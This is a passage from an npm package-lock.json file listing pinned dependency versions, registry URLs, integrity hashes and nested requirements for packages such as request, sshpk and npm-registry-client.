"https://registry.npmjs.org/normalize-package-data/-/normalize-package-data-2.5.0.tgz", "integrity": "sha512-/5CMN3T0R4XTj4DcGaexo+roZSdSFW/0AOOTROrjxzCG1wrWXEsGbRKevjlIL+ZDE4sZlJr5ED4YW0yqmkK+eA==", "dependencies": { "hosted-git-info": "^2.1.4", "resolve": "^1.10.0", "semver": "2 || 3 || 4 || 5", "validate-npm-package-license": "^3.0.1" } }, "node_modules/npm-package-arg": { "version": "3.1.1", "resolved": "https://registry.npmjs.org/npm-package-arg/-/npm-package-arg-3.1.1.tgz", "integrity": "sha512-jOIv9ddxThaiiI6WH2kLOsUL0vpA1rb7laRZO45OxSzGAj1ouiW0uQLq4zK2LR82pjeBO64VmEHHgUXHkyCQRw==", "dependencies": { "hosted-git-info": "^1.5.3", "semver": "4" } }, "node_modules/npm-package-arg/node_modules/hosted-git-info": { "version": "1.6.0", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-1.6.0.tgz", "integrity": "sha512-hX2w5jrEx2C64DRfLMb5OKHrZ8ReEkssfcjmrSHVih7dH1FD/qVn3/DfqLRQme2/CXBgpN/iApgAhpdaY+rCRQ==" }, "node_modules/npm-registry-client": { "version": "6.2.0", "resolved": "https://registry.npmjs.org/npm-registry-client/-/npm-registry-client-6.2.0.tgz", "integrity": "sha512-zFrsY9IAR3prA7lwKBWZXi/SdxPBbAQXFqQsbgGZXzECUda/8jVW2x3EfD+2h70o/PGio4K6rYvC/A/IoT1IOA==", "dependencies": { "chownr": "0", "concat-stream": "^1.4.6", "graceful-fs": "^3.0.0", "mkdirp": "^0.5.0", "normalize-package-data": "~1.0.1 || ^2.0.0", "npm-package-arg": "^3.0.0", "once": "^1.3.0", "request": "^2.47.0", "retry": "^0.6.1", "rimraf": "2", "semver": "2 >=2.2.1 || 3.x || 4", "slide": "^1.1.3" }, "optionalDependencies": { "npmlog": "" } }, "node_modules/npmlog": { "version": "7.0.1", "resolved": "https://registry.npmjs.org/npmlog/-/npmlog-7.0.1.tgz", "integrity": "sha512-uJ0YFk/mCQpLBt+bxN88AKd+gyqZvZDbtiNxk6Waqcj2aPRyfVx8ITawkyQynxUagInjdYT1+qj4NfA5KJJUxg==", "optional": true, "dependencies": { "are-we-there-yet": "^4.0.0", "console-control-strings": "^1.1.0", "gauge": "^5.0.0", "set-blocking": "^2.0.0" }, "engines": { "node": "^14.17.0 || ^16.13.0 || >=18.0.0" } }, "node_modules/oauth-sign": { "version": "0.9.0", "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==", "engines": { "node": "*" } }, "node_modules/once": { "version": "1.4.0", "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", "dependencies": { "wrappy": "1" } }, "node_modules/path-is-absolute": { "version": "1.0.1", "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", "engines": { "node": ">=0.10.0" } }, "node_modules/path-parse": { "version": "1.0.7", "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==" }, "node_modules/performance-now": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", "integrity": "sha512-7EAHlyLHI56VEIdK57uwHdHKIaAGbnXPiw0yWbarQZOKaKpvUIgW0jWRVLiatnM+XXlSwsanIBH/hzGMJulMow==" }, "node_modules/process-nextick-args": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/process-nextick-args/-/process-nextick-args-2.0.1.tgz", "integrity": "sha512-3ouUOpQhtgrbOa17J7+uxOTpITYWaGP7/AhoR3+A+/1e9skrzelGi/dXzEYyvbxubEF6Wn2ypscTKiKJFFn1ag==" }, "node_modules/psl": { "version": "1.9.0", "resolved": "https://registry.npmjs.org/psl/-/psl-1.9.0.tgz", "integrity": "sha512-E/ZsdU4HLs/68gYzgGTkMicWTLPdAftJLfJFlLUAAKZGkStNU72sZjT66SnMDVOfOWY/YAoiD7Jxa9iHvngcag==" }, "node_modules/punycode": { "version": "2.3.1", "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.3.1.tgz", "integrity": "sha512-vYt7UD1U9Wg6138shLtLOvdAu+8DsC/ilFtEVHcH+wydcSpNE20AfSOduf6MkRFahL5FY7X1oU7nKVZFtfq8Fg==", "engines": { "node": ">=6" } }, "node_modules/qs": { "version": "6.5.3", "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==", "engines": { "node": ">=0.6" } }, "node_modules/readable-stream": { "version": "2.3.8", "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.8.tgz", "integrity": "sha512-8p0AUk4XODgIewSi0l8Epjs+EVnWiK7NoDIEGU0HhE7+ZyY8D1IMY7odu5lRrFXGg71L15KG8QrPmum45RTtdA==", "dependencies": { "core-util-is": "~1.0.0", "inherits": "~2.0.3", "isarray": "~1.0.0", "process-nextick-args": "~2.0.0", "safe-buffer": "~5.1.1", "string_decoder": "~1.1.1", "util-deprecate": "~1.0.1" } }, "node_modules/request": { "version": "2.88.2", "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", "deprecated": "request has been deprecated, see https://github.com/request/request/issues/3142", "dependencies": { "aws-sign2": "~0.7.0", "aws4": "^1.8.0", "caseless": "~0.12.0", "combined-stream": "~1.0.6", "extend": "~3.0.2", "forever-agent": "~0.6.1", "form-data": "~2.3.2", "har-validator": "~5.1.3", "http-signature": "~1.2.0", "is-typedarray": "~1.0.0", "isstream": "~0.1.2", "json-stringify-safe": "~5.0.1", "mime-types": "~2.1.19", "oauth-sign": "~0.9.0", "performance-now": "^2.1.0", "qs": "~6.5.2", "safe-buffer": "^5.1.2", "tough-cookie": "~2.5.0", "tunnel-agent": "^0.6.0", "uuid": "^3.3.2" }, "engines": { "node": ">= 6" } }, "node_modules/resolve": { "version": "1.22.8", "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", "integrity": "sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", "dependencies": { "is-core-module": "^2.13.0", "path-parse": "^1.0.7", "supports-preserve-symlinks-flag": "^1.0.0" }, "bin": { "resolve": "bin/resolve" }, "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/retry": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/retry/-/retry-0.6.1.tgz", "integrity": "sha512-txv1qsctZq8ei9J/uCXgaKKFPjlBB0H2hvtnzw9rjKWFNUFtKh59WprXxpAeAey3/QeWwHdxMFqStPaOAgy+dA==", "engines": { "node": "*" } }, "node_modules/rimraf": { "version": "2.7.1", "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-2.7.1.tgz", "integrity": "sha512-uWjbaKIK3T1OSVptzX7Nl6PvQ3qAGtKEtVRjRuazjfL3Bx5eI409VZSqgND+4UNnmzLVdPj9FqFJNPqBZFve4w==", "dependencies": { "glob": "^7.1.3" }, "bin": { "rimraf": "bin.js" } }, "node_modules/safe-buffer": { "version": "5.1.2", "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" }, "node_modules/safer-buffer": { "version": "2.1.2", "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" }, "node_modules/semver": { "version": "4.3.6", "resolved": "https://registry.npmjs.org/semver/-/semver-4.3.6.tgz", "integrity": "sha512-IrpJ+yoG4EOH8DFWuVg+8H1kW1Oaof0Wxe7cPcXW3x9BjkN/eVo54F15LyqemnDIUYskQWr9qvl/RihmSy6+xQ==", "bin": { "semver": "bin/semver" } }, "node_modules/set-blocking": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/set-blocking/-/set-blocking-2.0.0.tgz", "integrity": "sha512-KiKBS8AnWGEyLzofFfmvKwpdPzqiy16LvQfK3yv/fVH7Bj13/wl3JSR1J+rfgRE9q7xUJK4qvgS8raSOeLUehw==", "optional": true }, "node_modules/signal-exit": { "version": "4.1.0", "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==", "optional": true, "engines": { "node": ">=14" }, "funding": { "url": "https://github.com/sponsors/isaacs" } }, "node_modules/slide": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/slide/-/slide-1.1.6.tgz", "integrity": "sha512-NwrtjCg+lZoqhFU8fOwl4ay2ei8PaqCBOUV3/ektPY9trO1yQ1oXEfmHAhKArUVUr/hOHvy5f6AdP17dCM0zMw==", "engines": { "node": "*" } }, "node_modules/spdx-correct": { "version": "3.2.0", "resolved": "https://registry.npmjs.org/spdx-correct/-/spdx-correct-3.2.0.tgz", "integrity": "sha512-kN9dJbvnySHULIluDHy32WHRUu3Og7B9sbY7tsFLctQkIqnMh3hErYgdMjTYuqmcXX+lK5T1lnUt3G7zNswmZA==", "dependencies": { "spdx-expression-parse": "^3.0.0", "spdx-license-ids": "^3.0.0" } }, "node_modules/spdx-exceptions": { "version": "2.4.0", "resolved": "https://registry.npmjs.org/spdx-exceptions/-/spdx-exceptions-2.4.0.tgz", "integrity": "sha512-hcjppoJ68fhxA/cjbN4T8N6uCUejN8yFw69ttpqtBeCbF3u13n7mb31NB9jKwGTTWWnt9IbRA/mf1FprYS8wfw==" }, "node_modules/spdx-expression-parse": { "version": "3.0.1", "resolved": "https://registry.npmjs.org/spdx-expression-parse/-/spdx-expression-parse-3.0.1.tgz", "integrity": "sha512-cbqHunsQWnJNE6KhVSMsMeH5H/L9EpymbzqTQ3uLwNCLZ1Q481oWaofqH7nO6V07xlXwY6PhQdQ2IedWx/ZK4Q==", "dependencies": { "spdx-exceptions": "^2.1.0", "spdx-license-ids": "^3.0.0" } }, "node_modules/spdx-license-ids": { "version": "3.0.17", "resolved": "https://registry.npmjs.org/spdx-license-ids/-/spdx-license-ids-3.0.17.tgz", "integrity": "sha512-sh8PWc/ftMqAAdFiBu6Fy6JUOYjqDJBJvIhpfDMyHrr0Rbp5liZqd4TjtQ/RgfLjKFZb+LMx5hpml5qOWy0qvg==" }, "node_modules/sshpk": { "version": "1.18.0", "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.18.0.tgz", "integrity": "sha512-2p2KJZTSqQ/I3+HX42EpYOa2l3f8Erv8MWKsy2I9uf4wA7yFIkXRffYdsx86y6z4vHtV8u7g+pPlr8/4ouAxsQ==", "dependencies": { "asn1": "~0.2.3", "assert-plus": "^1.0.0", "bcrypt-pbkdf": "^1.0.0", "dashdash": "^1.12.0", "ecc-jsbn": "~0.1.1", "getpass": "^0.1.1", "jsbn": "~0.1.0", "safer-buffer": "^2.0.2", "tweetnacl": "~0.14.0" }, "bin": { "sshpk-conv": "bin/sshpk-conv", "sshpk-sign": "bin/sshpk-sign", "sshpk-verify": "bin/sshpk-verify" }, "engines": { "node": ">=0.10.0" } }, "node_modules/string_decoder": { "version": "1.1.1", "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", "dependencies": { "safe-buffer": "~5.1.0" } }, "node_modules/string-width": { "version": "4.2.3", "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", "optional": true, "dependencies": { "emoji-regex": "^8.0.0", "is-fullwidth-code-point": "^3.0.0", "strip-ansi": "^6.0.1" }, "engines": { "node": ">=8" } }, "node_modules/strip-ansi": { "version": "6.0.1", "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", "optional": true, "dependencies": { "ansi-regex": "^5.0.1" }, "engines": { "node": ">=8" } }, "node_modules/supports-preserve-symlinks-flag": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", "engines": { "node": ">= 0.4" }, "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/tough-cookie": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", "dependencies": { "psl": "^1.1.28", "punycode": "^2.1.1" }, "engines": { "node": ">=0.8" } }, "node_modules/tunnel-agent": { "version": "0.6.0", "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", "integrity": "sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", "dependencies": { "safe-buffer": "^5.0.1" }, "engines": { "node": "*" } }, "node_modules/tweetnacl": { "version": "0.14.5", "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", "integrity": "sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA==" }, "node_modules/typedarray": { "version": "0.0.6", "resolved": "https://registry.npmjs.org/typedarray/-/typedarray-0.0.6.tgz", "integrity": "sha512-/aCDEGatGvZ2BIk+HmLf4ifCJFwvKFNb9/JeZPMulfgFracn9QFcAf5GO8B/mweUjSoblS5In0cWhqpfs/5PQA==" }, "node_modules/uri-js": { "version": "4.4.1", "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", "dependencies": { "punycode": "^2.1.0" } }, "node_modules/util-deprecate": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/util-deprecate/-/util-deprecate-1.0.2.tgz", "integrity": "sha512-EPD5q1uXyFxJpCrLnCc1nHnq3gOa6DZBocAIiI2TaSCA7VCJ1UJDMagCzIkXNsUYfD1daK//LTEQ8xiIbrHtcw==" }, "node_modules/uuid": { "version": "3.4.0", "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==", "deprecated": "Please upgrade to version 7 or higher. Older versions may use Math.random() in certain circumstances, which is known to be problematic. See https://v8.dev/blog/math-random for details.", "bin": { "uuid": "bin/uuid" } }, "node_modules/validate-npm-package-license": { "version": "3.0.4", "resolved": "https://registry.npmjs.org/validate-npm-package-license/-/validate-npm-package-license-3.0.4.tgz", "integrity": "sha512-DpKm2Ui/xN7/HQKCtpZxoRWBhZ9Z0kqtygG8XCgNQ8ZlDnxuQmWhj566j8fN4Cu3/JmbhsDo7fcAJq4s9h27Ew==", "dependencies": { "spdx-correct": "^3.0.0", "spdx-expression-parse": "^3.0.0" } }, "node_modules/verror": { "version": "1.10.0", "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", "integrity": "sha512-ZZKSmDAEFOijERBLkmYfJ+vmk3w+7hOLYDNkRCuRuMJGEmqYNCNLyBBFwWKVMhfwaEF3WOd0Zlw86U/WC/+nYw==", "engines": [ "node >=0.6.0" ], "dependencies": { "assert-plus": "^1.0.0", "core-util-is": "1.0.2", "extsprintf": "^1.2.0" } }, "node_modules/verror/node_modules/core-util-is": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", "integrity": "sha512-3lqz5YjWTYnW6dlDa5TLaTCcShfar1e40rmcJVwCBJC6mWlFuj0eCHIElmG1g5kyuJ/GD+8Wn4FFCcz4gJPfaQ==" }, "node_modules/wide-align": { "version": "1.1.5", "resolved": "https://registry.npmjs.org/wide-align/-/wide-align-1.1.5.tgz", "integrity": "sha512-eDMORYaPNZ4sQIuuYPDHdQvf4gyCF9rEEV/yPxGfwPkRodwEgiMUUXTx/dex+Me0wxx53S+NgUHaP7y3MGlDmg==", "optional": true, "dependencies": { "string-width": "^1.0.2 || 2 || 3 || 4" } }, "node_modules/wrappy": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" } }, "dependencies": { "ajv": { "version": "6.12.6", "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", "requires": { "fast-deep-equal": "^3.1.1", "fast-json-stable-stringify": "^2.0.0", "json-schema-traverse": "^0.4.1", "uri-js": "^4.2.2" } }, "ansi-regex": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", "optional": true }, "aproba": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/aproba/-/aproba-2.0.0.tgz", "integrity": "sha512-lYe4Gx7QT+MKGbDsA+Z+he/Wtef0BiwDOlK/XkBrdfsh9J/jPPXbX0tE9x9cl27Tmu5gg3QUbUrQYa/y+KOHPQ==", "optional": true }, "are-we-there-yet": { "version": "4.0.2", "resolved": "https://registry.npmjs.org/are-we-there-yet/-/are-we-there-yet-4.0.2.tgz", "integrity": "sha512-ncSWAawFhKMJDTdoAeOV+jyW1VCMj5QIAwULIBV0SSR7B/RLPPEQiknKcg/RIIZlUQrxELpsxMiTUoAQ4sIUyg==", "optional": true }, "asn1": { "version": "0.2.6", "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", "requires": { "safer-buffer": "~2.1.0" } }, "assert-plus": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", "integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==" }, "asynckit": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==" }, "aws-sign2": { "version": "0.7.0", "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", "integrity": "sha512-08kcGqnYf/YmjoRhfxyu+CLxBjUtHLXLXX/vUfx9l2LYzG3c1m61nrpyFUZI6zeS+Li/wWMMidD9KgrqtGq3mA==" }, "aws4": { "version": "1.12.0", "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.12.0.tgz", "integrity": "sha512-NmWvPnx0F1SfrQbYwOi7OeaNGokp9XhzNioJ/CSBs8Qa4vxug81mhJEAVZwxXuBmYB5KDRfMq/F3RR0BIU7sWg==" }, "balanced-match": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" }, "bcrypt-pbkdf": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", "integrity": "sha512-qeFIXtP4MSoi6NLqO12WfqARWWuCKi2Rn/9hJLEmtB5yTNr9DqFWkJRCf2qShWzPeAMRnOgCrq0sg/KLv5ES9w==", "requires": { "tweetnacl": "^0.14.3" } }, "brace-expansion": { "version": "1.1.11", "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", "requires": { "balanced-match": "^1.0.0", "concat-map": "0.0.1" } }, "caseless": { "version": "0.12.0", "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", "integrity": "sha512-4tYFyifaFfGacoiObjJegolkwSU4xQNGbVgUiNYVUxbQ2x2lUsFvY4hVgVzGiIe6WLOPqycWXA40l+PWsxthUw==" }, "chownr": { "version": "0.0.2", "resolved": "https://registry.npmjs.org/chownr/-/chownr-0.0.2.tgz", "integrity": "sha512-4sa7ZJ+/DavveVRsu49tUbYvLn5cS75w8gLQr14jXlFxSNbuoY7G6gPjcVfgdQ+c4BW02b0hXV5nOXYFD7Fmpw==" }, "color-support": { "version": "1.1.3", "resolved": "https://registry.npmjs.org/color-support/-/color-support-1.1.3.tgz", "integrity": "sha512-qiBjkpbMLO/HL68y+lh4q0/O1MZFj2RX6X/KmMa3+gJD3z+WwI1ZzDHysvqHGS3mP6mznPckpXmw1nI9cJjyRg==", "optional": true }, "combined-stream": { "version": "1.0.8", "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", "requires": { "delayed-stream": "~1.0.0" } }, "concat-map": { "version": "0.0.1", "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==" }, "concat-stream": { "version": "1.5.0", "resolved": "https://registry.npmjs.org/concat-stream/-/concat-stream-1.5.0.tgz", "integrity": "sha512-litEocitzYgqQ0IPaoLw+tCHcVcJJYW05+SAhH+LS9qutSC7iuejvawts3cUYQycZbRbLsjG8mCJLQi2KX5kEw==", "requires": { "inherits": "~2.0.1", "readable-stream": "~2.0.0", "typedarray": "~0.0.5" } }, "console-control-strings": { "version": "1.1.0", "resolved": "https://registry.npmjs.org/console-control-strings/-/console-control-strings-1.1.0.tgz", "integrity": "sha512-ty/fTekppD2fIwRvnZAVdeOiGd1c7YXEixbgJTNzqcxJWKQnjJ/V1bNEEE6hygpM3WjwHFUVK6HTjWSzV4a8sQ==", "optional": true }, "core-util-is": { "version": "1.0.3", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.3.tgz", "integrity": "sha512-ZQBvi1DcpJ4GDqanjucZ2Hj3wEO5pZDS89BWbkcrvdxksJorwUDDZamX9ldFkp9aw2lmBDLgkObEA4DWNJ9FYQ==" }, "dashdash": { "version": "1.14.1", "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", "integrity": "sha512-jRFi8UDGo6j+odZiEpjazZaWqEal3w/basFjQHQEwVtZJGDpxbH1MeYluwCS8Xq5wmLJooDlMgvVarmWfGM44g==", "requires": { "assert-plus": "^1.0.0" } }, "delayed-stream": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==" }, "ecc-jsbn": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", "integrity": "sha512-eh9O+hwRHNbG4BLTjEl3nw044CkGm5X6LoaCf7LPp7UU8Qrt47JYNi6nPX8xjW97TKGKm1ouctg0QSpZe9qrnw==", "requires": { "jsbn": "~0.1.0", "safer-buffer": "^2.1.0" } }, "emoji-regex": { "version": "8.0.0", "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", "optional": true }, "extend": { "version": "3.0.2", "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" }, "extsprintf": { "version": "1.3.0", "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", "integrity": "sha512-11Ndz7Nv+mvAC1j0ktTa7fAb0vLyGGX+rMHNBYQviQDGU0Hw7lhctJANqbPhu9nV9/izT/IntTgZ7Im/9LJs9g==" }, "fast-deep-equal": { "version": "3.1.3", "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" }, "fast-json-stable-stringify": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" }, "forever-agent": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", "integrity": "sha512-j0KLYPhm6zeac4lz3oJ3o65qvgQCcPubiyotZrXqEaG4hNagNYO8qdlUrX5vwqv9ohqeT/Z3j6+yW067yWWdUw==" }, "form-data": { "version": "2.3.3", "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", "requires": { "asynckit": "^0.4.0", "combined-stream": "^1.0.6", "mime-types": "^2.1.12" } }, "fs.realpath": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==" }, "function-bind": { "version": "1.1.2", "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==" }, "gauge": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/gauge/-/gauge-5.0.1.tgz", "integrity": 